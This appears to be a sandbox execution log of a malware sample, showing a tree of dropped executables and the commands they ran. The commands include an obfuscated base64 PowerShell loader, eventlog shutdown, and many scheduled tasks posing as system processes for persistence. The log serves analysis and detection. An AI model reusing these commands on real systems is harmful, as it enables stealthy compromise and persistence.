- C:\Users\Admin\AppData\Local\Temp\a\swiiii.exe
  "C:\Users\Admin\AppData\Local\Temp\a\swiiii.exe"
  2⤵
  PID:1240
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
    3⤵
    PID:5796
- C:\Users\Admin\AppData\Local\Temp\a\ISetup5.exe
  "C:\Users\Admin\AppData\Local\Temp\a\ISetup5.exe"
  2⤵
  PID:5992
- - C:\Users\Admin\AppData\Local\Temp\u4mg.0.exe
    "C:\Users\Admin\AppData\Local\Temp\u4mg.0.exe"
    3⤵
    PID:5412
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 5412 -s 1180
      4⤵
      Program crash
      PID:4152
- - C:\Users\Admin\AppData\Local\Temp\u4mg.1.exe
    "C:\Users\Admin\AppData\Local\Temp\u4mg.1.exe"
    3⤵
    PID:6072
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 5992 -s 1504
    3⤵
    - Program crash
    PID:444
- C:\Users\Admin\AppData\Local\Temp\a\mstsc.exe
  "C:\Users\Admin\AppData\Local\Temp\a\mstsc.exe"
  2⤵
  PID:5308
- - C:\Program Files (x86)\Microsoft Jufbhx\Jufrxnb.exe
    "C:\Program Files (x86)\Microsoft Jufbhx\Jufrxnb.exe"
    3⤵
    PID:2368
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 2368 -s 584
      4⤵
      Program crash
      PID:5992
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 5308 -s 1064
    3⤵
    - Program crash
    PID:5816
- C:\Users\Admin\AppData\Local\Temp\a\crypted_097f1784.exe
  "C:\Users\Admin\AppData\Local\Temp\a\crypted_097f1784.exe"
  2⤵
  PID:6116
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
    3⤵
    PID:6132
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 6116 -s 792
    3⤵
    - Program crash
    PID:5296
- C:\Users\Admin\AppData\Local\Temp\a\june.exe
  "C:\Users\Admin\AppData\Local\Temp\a\june.exe"
  2⤵
  PID:4344
- - C:\Users\Admin\AppData\Local\Temp\is-92TD2.tmp\june.tmp
    "C:\Users\Admin\AppData\Local\Temp\is-92TD2.tmp\june.tmp" /SL5="$A021C,3573915,54272,C:\Users\Admin\AppData\Local\Temp\a\june.exe"
    3⤵
    PID:5800
  - - C:\Users\Admin\AppData\Local\Sun Vox\sunvox32.exe
      "C:\Users\Admin\AppData\Local\Sun Vox\sunvox32.exe" -i
      4⤵
      PID:4264
  - - C:\Users\Admin\AppData\Local\Sun Vox\sunvox32.exe
      "C:\Users\Admin\AppData\Local\Sun Vox\sunvox32.exe" -s
      4⤵
      PID:6136
- C:\Users\Admin\AppData\Local\Temp\a\crypted_33cb9091.exe
  "C:\Users\Admin\AppData\Local\Temp\a\crypted_33cb9091.exe"
  2⤵
  PID:2080
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
    3⤵
    PID:5180
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
    3⤵
    PID:5416
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 2080 -s 796
    3⤵
    - Program crash
    PID:5284
- C:\Users\Admin\AppData\Local\Temp\a\new.exe
  "C:\Users\Admin\AppData\Local\Temp\a\new.exe"
  2⤵
  PID:5996
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
    3⤵
    PID:6056
- C:\Users\Admin\AppData\Local\Temp\a\ttt01.exe
  "C:\Users\Admin\AppData\Local\Temp\a\ttt01.exe"
  2⤵
  PID:2732
- C:\Users\Admin\AppData\Local\Temp\a\123p.exe
  "C:\Users\Admin\AppData\Local\Temp\a\123p.exe"
  2⤵
  PID:5288
- - C:\Windows\system32\powercfg.exe
    C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
    3⤵
    PID:2328
- - C:\Windows\system32\powercfg.exe
    C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
    3⤵
    PID:1376
- - C:\Windows\system32\powercfg.exe
    C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
    3⤵
    PID:6080
- - C:\Windows\system32\powercfg.exe
    C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
    3⤵
    PID:6020
- - C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe delete "OBGPQMHF"
    3⤵
    - Launches sc.exe
    PID:3376
- - C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe create "OBGPQMHF" binpath= "C:\ProgramData\ndfbaljqaqzm\dckuybanmlgp.exe" start= "auto"
    3⤵
    - Launches sc.exe
    PID:5876
- - C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe stop eventlog
    3⤵
    - Launches sc.exe
    PID:6068
- - C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe start "OBGPQMHF"
    3⤵
    - Launches sc.exe
    PID:772
- C:\Users\Admin\AppData\Local\Temp\a\IjerkOff.exe
  "C:\Users\Admin\AppData\Local\Temp\a\IjerkOff.exe"
  2⤵
  PID:5224
- - C:\Windows\SysWOW64\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\BlockComponentwebMonitordhcp\AbAw8xfGFsmxdxvuwvbKubDJeV.vbe"
    3⤵
    PID:5496
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\BlockComponentwebMonitordhcp\8H5kf2bUK2r.bat" "
      4⤵
      PID:5872
    - - C:\BlockComponentwebMonitordhcp\agentDllDhcp.exe
        
        "C:\BlockComponentwebMonitordhcp\agentDllDhcp.exe"
        5⤵
        
        PID:5728
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\uSlooRQrqy.bat"
        6⤵
        
        PID:2420
        
        C:\Windows\system32\w32tm.exe
        
        w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
        7⤵
        
        PID:5844
        
        C:\odt\dllhost.exe
        
        "C:\odt\dllhost.exe"
        7⤵
        
        PID:2308
- C:\Users\Admin\AppData\Local\Temp\a\ISetup1.exe
  "C:\Users\Admin\AppData\Local\Temp\a\ISetup1.exe"
  2⤵
  PID:1432
- - C:\Users\Admin\AppData\Local\Temp\u13s.0.exe
    "C:\Users\Admin\AppData\Local\Temp\u13s.0.exe"
    3⤵
    PID:1248
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 1248 -s 1020
      4⤵
      Program crash
      PID:4200
- - C:\Users\Admin\AppData\Local\Temp\u13s.1.exe
    "C:\Users\Admin\AppData\Local\Temp\u13s.1.exe"
    3⤵
    PID:3452
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 1432 -s 1192
    3⤵
    - Program crash
    PID:1192
- C:\Users\Admin\AppData\Local\Temp\a\diufhloadme.exe
  "C:\Users\Admin\AppData\Local\Temp\a\diufhloadme.exe"
  2⤵
  PID:3176
- - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe
    C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe
    3⤵
    PID:1872
- - C:\Windows\SYSTEM32\cmd.exe
    "cmd" /c mkdir "C:\Users\Admin\AppData\Roaming\grhgjhjh"
    3⤵
    PID:1456
- - C:\Windows\SYSTEM32\cmd.exe
    "cmd" /c schtasks /create /sc minute /mo 1 /tn "Nafifas" /tr "'C:\Users\Admin\AppData\Roaming\grhgjhjh\grhgjhjh.exe'" /f
    3⤵
    PID:5524
  - - C:\Windows\system32\schtasks.exe
      schtasks /create /sc minute /mo 1 /tn "Nafifas" /tr "'C:\Users\Admin\AppData\Roaming\grhgjhjh\grhgjhjh.exe'" /f
      4⤵
      Creates scheduled task(s)
      PID:5844
- - C:\Windows\SYSTEM32\cmd.exe
    "cmd" /c copy "C:\Users\Admin\AppData\Local\Temp\a\diufhloadme.exe" "C:\Users\Admin\AppData\Roaming\grhgjhjh\grhgjhjh.exe"
    3⤵
    PID:5808
- C:\Users\Admin\AppData\Local\Temp\a\ghhjhjhsg.exe
  "C:\Users\Admin\AppData\Local\Temp\a\ghhjhjhsg.exe"
  2⤵
  PID:1680
- - C:\Windows\SYSTEM32\schtasks.exe
    "schtasks" /create /tn "hgfhjjhgj" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\ghghghfg\gfhgfgjgf.exe" /rl HIGHEST /f
    3⤵
    - Creates scheduled task(s)
    PID:4000
- C:\Users\Admin\AppData\Local\Temp\a\crypt.exe
  "C:\Users\Admin\AppData\Local\Temp\a\crypt.exe"
  2⤵
  PID:4476
- - C:\Windows\SysWOW64\wscript.exe
    "wscript.exe" "C:\Users\Admin\start.vbs"
    3⤵
    PID:3996
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\temp.bat" "
      4⤵
      PID:5792
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -command "[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('ZnVuY3Rpb24gRGVjb21wcmVzc0J5dGVzKCRjb21wcmVzc2VkRGF0YSkgeyAkbXMgPSBbSU8uTWVtb3J5U3RyZWFtXTo6bmV3KChbU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZTY0U3RyaW5nKCRjb21wcmVzc2VkRGF0YSkpKTsgJG1zLlBvc2l0aW9uID0gMDsgJGRlZmxhdGVTdHJlYW0gPSBbSU8uQ29tcHJlc3Npb24uRGVmbGF0ZVN0cmVhbV06Om5ldygkbXMsIFtJTy5Db21wcmVzc2lvbi5Db21wcmVzc2lvbk1vZGVdOjpEZWNvbXByZXNzKTsgJGJ1ZmZlciA9IFtieXRlW11dOjpuZXcoNDA5Nik7ICRtcyA9IFtJTy5NZW1vcnlTdHJlYW1dOjpuZXcoKTsgd2hpbGUgKCR0cnVlKSB7ICRjb3VudCA9ICRkZWZsYXRlU3RyZWFtLlJlYWQoJGJ1ZmZlciwgMCwgJGJ1ZmZlci5MZW5ndGgpOyBpZiAoJGNvdW50IC1lcSAwKSB7IGJyZWFrIH0gJG1zLldyaXRlKCRidWZmZXIsIDAsICRjb3VudCkgfSAkZGVmbGF0ZVN0cmVhbS5DbG9zZSgpOyAkbXMuVG9BcnJheSgpIH0NCg0KZnVuY3Rpb24gUmV2ZXJzZVN0cmluZygkaW5wdXRTdHJpbmcpIHsNCiAgICAkY2hhckFycmF5ID0gJGlucHV0U3RyaW5nLlRvQ2hhckFycmF5KCkgICMgQ29udmVydCBzdHJpbmcgdG8gY2hhcmFjdGVyIGFycmF5DQogICAgJHJldmVyc2VkQXJyYXkgPSAkY2hhckFycmF5Wy0xLi4tKCRjaGFyQXJyYXkuTGVuZ3RoKV0gICMgUmV2ZXJzZSB0aGUgYXJyYXkNCiAgICAkcmV2ZXJzZWRTdHJpbmcgPSAtam9pbiAkcmV2ZXJzZWRBcnJheSAgIyBDb252ZXJ0IHRoZSByZXZlcnNlZCBhcnJheSBiYWNrIHRvIGEgc3RyaW5nDQogICAgcmV0dXJuICRyZXZlcnNlZFN0cmluZw0KfQ0KDQpmdW5jdGlvbiBDbG9zZS1Qcm9jZXNzIHsNCiAgICBwYXJhbSgNCiAgICAgICAgW3N0cmluZ10kUHJvY2Vzc05hbWUNCiAgICApDQoNCiAgICAkcHJvY2VzcyA9IEdldC1Qcm9jZXNzIC1OYW1lICRQcm9jZXNzTmFtZSAtRXJyb3JBY3Rpb24gU2lsZW50bHlDb250aW51ZQ0KDQogICAgaWYgKCRwcm9jZXNzIC1uZSAkbnVsbCkgew0KICAgICAgICBTdG9wLVByb2Nlc3MgLU5hbWUgJFByb2Nlc3NOYW1lIC1Gb3JjZQ0KCX0NCn0NCg0KZnVuY3Rpb24gQ29udmVydC1Bc2NpaVRvU3RyaW5nKCRhc2NpaUFycmF5KXsNCiRvZmZTZXRJbnRlZ2VyPTEyMzsNCiRkZWNvZGVkU3RyaW5nPSROdWxsOw0KZm9yZWFjaCgkYXNjaWlJbnRlZ2VyIGluICRhc2NpaUFycmF5KXskZGVjb2RlZFN0cmluZys9W2NoYXJdKCRhc2NpaUludGVnZXItJG9mZlNldEludGVnZXIpfTsNCnJldHVybiAkZGVjb2RlZFN0cmluZ307DQoNCg0KDQokZW5jb2RlZEFycmF5ID0gQCgxNTksMjIwLDIzOCwyMzgsMjI0LDIzMiwyMjEsMjMxLDI0NCwxNjksMTkyLDIzMywyMzksMjM3LDI0NCwyMDMsMjM0LDIyOCwyMzMsMjM5LDE2OSwxOTYsMjMzLDI0MSwyMzQsMjMwLDIyNCwxNjMsMTU5LDIzMywyNDAsMjMxLDIzMSwxNjcsMTU5LDIzMywyNDAsMjMxLDIzMSwxNjQsMTgyKQ0KJGRlY29kZWRTdHJpbmcgPSBDb252ZXJ0LUFzY2lpVG9TdHJpbmcgJGVuY29kZWRBcnJheQ0KDQoNCiRmaWxlUGF0aCA9IEpvaW4tUGF0aCAkZW52OlVzZXJQcm9maWxlICJleHBsb3Jlci5iYXQiDQokbGFzdExpbmUgPSBHZXQtQ29udGVudCAtUGF0aCAkZmlsZVBhdGggfCBTZWxlY3QtT2JqZWN0IC1MYXN0IDENCiRjbGVhbmVkTGluZSA9ICRsYXN0TGluZSAtcmVwbGFjZSAnXjo6Jw0KJHJldmVyc2UgPSBSZXZlcnNlU3RyaW5nICRjbGVhbmVkTGluZQ0KJGRlY29tcHJlc3NlZEJ5dGUgPSBEZWNvbXByZXNzQnl0ZXMgLWNvbXByZXNzZWREYXRhICRyZXZlcnNlDQoNCiRhc3NlbWJseSA9IFtTeXN0ZW0uUmVmbGVjdGlvbi5Bc3NlbWJseV06OkxvYWQoW2J5dGVbXV0kZGVjb21wcmVzc2VkQnl0ZSkNCg0KJGFzc2VtYmx5ID0gW1N5c3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5XTo6TG9hZChbYnl0ZVtdXSRkZWNvbXByZXNzZWRCeXRlKQ0KDQpJbnZva2UtRXhwcmVzc2lvbiAkZGVjb2RlZFN0cmluZw0KDQpDbG9zZS1Qcm9jZXNzIC1Qcm9jZXNzTmFtZSAiY21kIg==')) | Out-File -FilePath 'C:\Users\Admin\explorer.ps1' -Encoding UTF8"
        5⤵
        
        PID:5480
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File "C:\Users\Admin\explorer.ps1"
        5⤵
        
        PID:1836
      - C:\Windows\SysWOW64\wermgr.exe
        
        "C:\Windows\system32\wermgr.exe" "-outproc" "0" "1836" "2372" "2348" "2376" "0" "0" "2380" "0" "0" "0" "0" "0"
        6⤵
        
        PID:2108
- C:\Users\Admin\AppData\Local\Temp\a\Opera_109.0.5097.38_Autoupdate_x64.exe
  "C:\Users\Admin\AppData\Local\Temp\a\Opera_109.0.5097.38_Autoupdate_x64.exe"
  2⤵
  PID:5196
- C:\Users\Admin\AppData\Local\Temp\a\toolspub1.exe
  "C:\Users\Admin\AppData\Local\Temp\a\toolspub1.exe"
  2⤵
  PID:2804
- C:\Users\Admin\AppData\Local\Temp\a\crypted_69a30000.exe
  "C:\Users\Admin\AppData\Local\Temp\a\crypted_69a30000.exe"
  2⤵
  PID:5428

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 444 -p 1576 -ip 1576
1⤵
PID:3976

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
PID:4348

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 508 -p 2712 -ip 2712
1⤵
PID:944

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 184 -p 4048 -ip 4048
1⤵
PID:4688

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 5404 -ip 5404
1⤵
PID:5948

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 5992 -ip 5992
1⤵
PID:6056

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 564 -p 5308 -ip 5308
1⤵
PID:1344

C:\Program Files (x86)\Microsoft Jufbhx\Jufrxnb.exe
"C:\Program Files (x86)\Microsoft Jufbhx\Jufrxnb.exe"
1⤵
PID:5140
- C:\Program Files (x86)\Microsoft Jufbhx\Jufrxnb.exe
  "C:\Program Files (x86)\Microsoft Jufbhx\Jufrxnb.exe"
  2⤵
  PID:6024
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 6024 -s 552
    3⤵
    - Program crash
    PID:1356
- C:\Program Files (x86)\Microsoft Jufbhx\Jufrxnb.exe
  "C:\Program Files (x86)\Microsoft Jufbhx\Jufrxnb.exe"
  2⤵
  PID:2216
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -u -p 5140 -s 568
  2⤵
  - Program crash
  PID:3768

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 2368 -ip 2368
1⤵
PID:1576

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 5140 -ip 5140
1⤵
PID:1120

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 496 -p 6116 -ip 6116
1⤵
PID:5472

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 576 -p 6024 -ip 6024
1⤵
PID:4376

C:\Users\Public\svchost.exe
C:\Users\Public\svchost.exe
1⤵
PID:3824

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 580 -p 5412 -ip 5412
1⤵
PID:5168

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 448 -p 2080 -ip 2080
1⤵
PID:2752

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 508 -p 1432 -ip 1432
1⤵
PID:2224

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 548 -p 1248 -ip 1248
1⤵
PID:1540

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "lsassl" /sc MINUTE /mo 11 /tr "'C:\Users\Public\lsass.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:5420

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "lsass" /sc ONLOGON /tr "'C:\Users\Public\lsass.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:3604

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "lsassl" /sc MINUTE /mo 6 /tr "'C:\Users\Public\lsass.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:5764

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "TrustedInstallerT" /sc MINUTE /mo 5 /tr "'C:\Program Files\VideoLAN\VLC\plugins\spu\TrustedInstaller.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:240

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "TrustedInstaller" /sc ONLOGON /tr "'C:\Program Files\VideoLAN\VLC\plugins\spu\TrustedInstaller.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1432

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "TrustedInstallerT" /sc MINUTE /mo 7 /tr "'C:\Program Files\VideoLAN\VLC\plugins\spu\TrustedInstaller.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:6020

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 5 /tr "'C:\odt\conhost.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:5980

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "conhost" /sc ONLOGON /tr "'C:\odt\conhost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:4916

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 6 /tr "'C:\odt\conhost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1516

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 9 /tr "'C:\odt\dllhost.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:4864

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dllhost" /sc ONLOGON /tr "'C:\odt\dllhost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:5408

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 10 /tr "'C:\odt\dllhost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:5700

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "crypted_097f1784c" /sc MINUTE /mo 11 /tr "'C:\Program Files\Windows Security\crypted_097f1784.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:6140

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "crypted_097f1784" /sc ONLOGON /tr "'C:\Program Files\Windows Security\crypted_097f1784.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:4744

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "crypted_097f1784c" /sc MINUTE /mo 9 /tr "'C:\Program Files\Windows Security\crypted_097f1784.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:5036

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 8 /tr "'C:\BlockComponentwebMonitordhcp\dllhost.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:5092

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dllhost" /sc ONLOGON /tr "'C:\BlockComponentwebMonitordhcp\dllhost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2936

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 11 /tr "'C:\BlockComponentwebMonitordhcp\dllhost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:5180

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "WmiPrvSEW" /sc MINUTE /mo 14 /tr "'C:\Recovery\WindowsRE\WmiPrvSE.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:6080

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "WmiPrvSE" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\WmiPrvSE.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:5468

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "WmiPrvSEW" /sc MINUTE /mo 6 /tr "'C:\Recovery\WindowsRE\WmiPrvSE.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:3188

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 7 /tr "'C:\Program Files\Uninstall Information\conhost.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:4836

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "conhost" /sc ONLOGON /tr "'C:\Program Files\Uninstall Information\conhost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:5476

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 11 /tr "'C:\Program Files\Uninstall Information\conhost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:6044

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "RuntimeBroker2R" /sc MINUTE /mo 9 /tr "'C:\Program Files\Microsoft Office\RuntimeBroker2.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:5356

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "RuntimeBroker2" /sc ONLOGON /tr "'C:\Program Files\Microsoft Office\RuntimeBroker2.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:5964

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "RuntimeBroker2R" /sc MINUTE /mo 14 /tr "'C:\Program Files\Microsoft Office\RuntimeBroker2.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1964

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "powershellp" /sc MINUTE /mo 11 /tr "'C:\Program Files\Windows Media Player\powershell.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:4744

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "powershell" /sc ONLOGON /tr "'C:\Program Files\Windows Media Player\powershell.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:5840

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "powershellp" /sc MINUTE /mo 5 /tr "'C:\Program Files\Windows Media Player\powershell.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:6072

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "fontdrvhostf" /sc MINUTE /mo 12 /tr "'C:\BlockComponentwebMonitordhcp\fontdrvhost.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:5504

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "fontdrvhost" /sc ONLOGON /tr "'C:\BlockComponentwebMonitordhcp\fontdrvhost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:5904

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "fontdrvhostf" /sc MINUTE /mo 11 /tr "'C:\BlockComponentwebMonitordhcp\fontdrvhost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:4532

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "servicess" /sc MINUTE /mo 8 /tr "'C:\Program Files\Microsoft Office 15\ClientX64\services.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:3136

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "services" /sc ONLOGON /tr "'C:\Program Files\Microsoft Office 15\ClientX64\services.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:832

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "servicess" /sc MINUTE /mo 6 /tr "'C:\Program Files\Microsoft Office 15\ClientX64\services.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1932

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "taskhostwt" /sc MINUTE /mo 14 /tr "'C:\Recovery\WindowsRE\taskhostw.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2088

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "taskhostw" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\taskhostw.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:5844

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "taskhostwt" /sc MINUTE /mo 14 /tr "'C:\Recovery\WindowsRE\taskhostw.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:5032

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dwmd" /sc MINUTE /mo 14 /tr "'C:\Windows\Performance\WinSAT\DataStore\dwm.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2784

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dwm" /sc ONLOGON /tr "'C:\Windows\Performance\WinSAT\DataStore\dwm.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:5408

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dwmd" /sc MINUTE /mo 10 /tr "'C:\Windows\Performance\WinSAT\DataStore\dwm.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1568

